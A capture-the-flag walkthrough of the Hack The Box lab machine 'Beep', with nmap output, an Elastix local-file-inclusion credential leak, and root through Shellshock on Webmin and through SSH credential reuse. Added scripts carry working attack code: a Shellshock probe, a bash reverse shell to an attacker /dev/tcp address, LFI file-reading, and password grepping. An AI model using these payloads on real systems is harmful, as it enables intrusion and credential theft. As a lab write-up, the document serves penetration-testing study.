I started by adding Beep's IP address 10.10.10.7 to /etc/hosts as beep.htb.
I ran a fast nmap scan of the top 1000 ports, followed by a fast scan of all ports.

I then ran a thorough scan of all of the open ports; this gave me the impression that there were a few possible attack vectors.
# Nmap 7.80 scan initiated Fri Apr 24 12:15:20 2020 as: nmap -A -p22,25,80,110,111,143,443,878,993,995,3306,4190,4445,5038,10000 -oN nmap-full.txt beep.htb
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.018s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://beep.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: EXPIRE(NEVER) STLS USER APOP LOGIN-DELAY(0) PIPELINING TOP RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE UIDL
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: IDLE CHILDREN Completed QUOTA URLAUTHA0001 RIGHTS=kxte THREAD=REFERENCES ACL IMAP4 LIST-SUBSCRIBED MULTIAPPEND X-NETSCAPE OK THREAD=ORDEREDSUBJECT NO LITERAL+ CATENATE UNSELECT SORT ID RENAME LISTEXT SORT=MODSEQ BINARY ANNOTATEMORE NAMESPACE STARTTLS ATOMIC IMAP4rev1 CONDSTORE MAILBOX-REFERRALS UIDPLUS
443/tcp open ssl/https?
|_ssl-date: 2020-04-24T10:21:45+00:00; -56m52s from scanner time.
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|media device|PBX|WAP|specialized|printer|proxy server
Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys embedded (94%), Riverbed RiOS (94%), HP embedded (94%), Osmosys embedded (93%), WebSense embedded (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.6.27 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:linksys:wrv54g cpe:/o:riverbed:rios cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.18 (95%), Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.27 (likely embedded) (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.27 (95%), Linux 2.6.30 (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.5-7.283-smp (SuSE Enterprise Server 9, x86) (95%), Linux 2.6.8 (Debian 3.1) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Host script results:
|_clock-skew: -56m52s
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 17.61 ms 10.10.14.1
2 18.77 ms beep.htb (10.10.10.7)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 24 12:21:12 2020 -- 1 IP address (1 host up) scanned in 352.49 seconds
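The scan sequence described above (fast scan of the top 1000 ports, fast scan of all ports, then a thorough scan of only the open ports), as an added shell example rather than the post's own commands. It derives the -p list from nmap's greppable output instead of retyping it; the output file names, the -T4/--min-rate tuning and the sample .gnmap lines in the comments are my choices, not from the post.

```shell
#!/usr/bin/env bash
# Added example: fast port discovery first, then -sC -sV -O on open ports only.
set -eu

# Convert greppable nmap output (-oG) into the comma-separated list that `nmap -p`
# expects. Reads one or more .gnmap files on stdin; duplicates are collapsed.
open_ports_from_gnmap() {
    awk '/Ports:/ {
            sub(/.*Ports: /, "")               # keep only the port list
            n = split($0, entry, ",")          # one entry per port
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")        # port/state/proto/owner/service/...
                if (f[2] == "open") print f[1] + 0
            }
        }' | sort -un | paste -sd, -
}

# The three-stage scan from the post, with the port list derived instead of typed.
scan_host() {                                  # scan_host beep.htb
    local host=$1
    nmap -T4 -oG "$host.top1000.gnmap" "$host" >/dev/null                 # default top 1000 ports
    nmap -T4 -p- --min-rate 2000 -oG "$host.all.gnmap" "$host" >/dev/null # all 65535 ports
    local ports
    ports=$(cat "$host.top1000.gnmap" "$host.all.gnmap" | open_ports_from_gnmap)
    [ -n "$ports" ] || { echo "no open TCP ports found on $host" >&2; return 1; }
    nmap -sC -sV -O -p "$ports" -oN "$host.full.txt" "$host"              # thorough scan, open ports only
}

# Usage: source this file, then `scan_host beep.htb`. A constructed .gnmap line
# looks like:
#   Host: 10.10.10.7 (beep.htb)<TAB>Ports: 22/open/tcp//ssh///, 80/open/tcp//http///<TAB>Ignored State: closed (65533)
```

Merging the two fast scans before the thorough one matters because a rate-limited -p- run can miss a port that the slower top-1000 scan caught; the sort -un step makes the union harmless.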
I decided to take a look at what was running on port 80, where I was presented with a login panel for Elastix.

Searching for exploits for this yielded several results. After taking a look at these, I eventually settled on an LFI exploit.

Visiting this directory on the web server presented me with a config file, where there appeared to be admin credentials stored; I simply used ctrl+f to search for “pass”.


I used these credentials to successfully authenticate against elastix.

Now that I was authenticated, I tried the LFI again, this time against different paths. I started with /etc/passwd to get an idea of the users on the system; fanis looks like a good candidate.

I used this knowledge to grab the user flag by traversing to /home/fanis/user.txt.

After enumerating this service further I didn't find anything helpful. I also unsuccessfully attempted to log in to the MySQL database using these credentials, due to my machine not having the appropriate permissions to access it. I decided to check out port 10000, which was running Webmin.
I noticed upon attempting to log in that it used CGI.

This could potentially be vulnerable to a Shellshock attack; I used this to successfully spawn a reverse shell as the root user.
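Shellshock (CVE-2014-6271) against the Webmin login CGI, as an added example that is not the post's own exploit: a benign probe that confirms the bug before any reverse shell is sent, the reverse-shell request itself, and a grep for the same pattern in access logs. WEBMIN, LOGIN_CGI, the attacker address and the sample log lines are assumptions; the post names neither the CGI path nor the exact request it used.

```shell
#!/usr/bin/env bash
# Added example: probe a CGI for Shellshock before exploiting it, plus the
# matching log check. Hosts and paths below are assumptions, not from the post.
set -eu

WEBMIN="${WEBMIN:-https://beep.htb:10000}"
# Assumed: Webmin's login form is handled by session_login.cgi; adjust to the
# CGI you actually saw during the login attempt.
LOGIN_CGI="${LOGIN_CGI:-/session_login.cgi}"

# The trigger: an exported function definition with a trailing command, which an
# unpatched bash runs while importing the variable the CGI layer built from our header.
shellshock_payload() {            # shellshock_payload 'id'
    printf '() { :; }; %s' "$1"
}

# Benign probe command. The first echo emits the blank line that ends the HTTP
# headers; without it the server answers "malformed header" and the marker is lost.
probe_command() {                 # probe_command MARKER
    printf 'echo; echo %s' "$1"
}

# Send the probe in User-Agent; returns 0 when the marker comes back in the body.
# Webmin's referer check rejects links from other sites, so point Referer at the target.
is_shellshock_vulnerable() {      # is_shellshock_vulnerable "$WEBMIN$LOGIN_CGI"
    local url=$1 marker="ssprobe$$"
    curl -sk --max-time 10 -H "Referer: ${url%/*}" \
        -A "$(shellshock_payload "$(probe_command "$marker")")" "$url" \
        | grep -q "$marker"
}

# The step the post describes: a bash reverse shell to LHOST:LPORT (start
# `nc -lvnp LPORT` first). The request never returns normally, hence || true.
shellshock_reverse_shell() {      # shellshock_reverse_shell URL 10.10.14.2 4444
    local url=$1 lhost=$2 lport=$3
    curl -sk --max-time 5 -H "Referer: ${url%/*}" \
        -A "$(shellshock_payload "bash -i >& /dev/tcp/$lhost/$lport 0>&1")" \
        "$url" >/dev/null 2>&1 || true
}

# Blue-team side: flag access-log lines carrying the function-definition prefix
# in any header field (User-Agent, Referer, Cookie...). Reads log text on stdin.
detect_shellshock() {
    grep -E '\(\)[[:space:]]*\{' || true
}

# Usage (source this file first):
#   if is_shellshock_vulnerable "$WEBMIN$LOGIN_CGI"; then
#       shellshock_reverse_shell "$WEBMIN$LOGIN_CGI" 10.10.14.2 4444
#   fi
```

The probe is worth the extra request: on a host that is not vulnerable the marker simply never appears, whereas firing the reverse shell blind tells you nothing when the listener stays quiet. The detection grep is deliberately loose (any `()` followed by `{`) because real payloads vary the body of the function, for example `() {:;};` or `() { ignored; };`.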


There is, however, a much easier way to root: using the credentials from the LFI exploit to log in via SSH…
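The credential-reuse chain from the LFI section through to this SSH login (config file via the LFI, /etc/passwd for candidate users, the user flag, then root over SSH), as an added example that is not from the post. LFI_URL and CONFIG_PATH are placeholders because the post does not name the vulnerable script, its parameter or the config file; the sample config and passwd lines in the test are constructed.

```shell
#!/usr/bin/env bash
# Added example: LFI -> credentials -> user list -> user flag -> SSH as root.
set -eu

# Placeholders: the post does not name the vulnerable script, its parameter
# or the config file that held the credentials.
LFI_URL="${LFI_URL:-https://beep.htb/vulnerable.php?file=}"
CONFIG_PATH="${CONFIG_PATH:-/path/to/config}"

# Read one server-side file through the LFI (-k: self-signed certificate).
lfi_read() {                      # lfi_read /etc/passwd
    curl -sk --max-time 10 "${LFI_URL}$1"
}

# The ctrl+f for "pass", scripted: print settings whose key looks like a
# password or secret. Reads the config text on stdin.
grep_passwords() {
    grep -iE '(pass|pwd|secret)[a-z_]*[[:space:]]*[=:]' | sed 's/^[[:space:]]*//'
}

# From /etc/passwd on stdin, print accounts worth trying: root and regular users
# with a real shell. CentOS 5 starts regular users at UID 500, so the usual
# ">= 1000" filter would drop fanis-style accounts.
interactive_users() {
    awk -F: '($3 == 0 || $3 >= 500) && $7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 }'
}

# OpenSSH 4.3 offers only SHA-1 key exchange and ssh-rsa/ssh-dss host keys,
# which current clients refuse by default ("no matching key exchange method",
# "no matching host key type"); re-enable them for this connection only.
legacy_ssh() {                    # legacy_ssh root@beep.htb
    ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 \
        -oHostKeyAlgorithms=+ssh-rsa \
        "$@"
}

# Walkthrough (source this file first):
#   lfi_read "$CONFIG_PATH" | grep_passwords
#   lfi_read /etc/passwd | interactive_users
#   lfi_read /home/fanis/user.txt
#   legacy_ssh root@beep.htb
```

Keep the legacy algorithms scoped to the one command (or a Host block in ~/.ssh/config) rather than enabling them globally; the same options that let you reach a 2006-era sshd would weaken every other connection the client makes.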
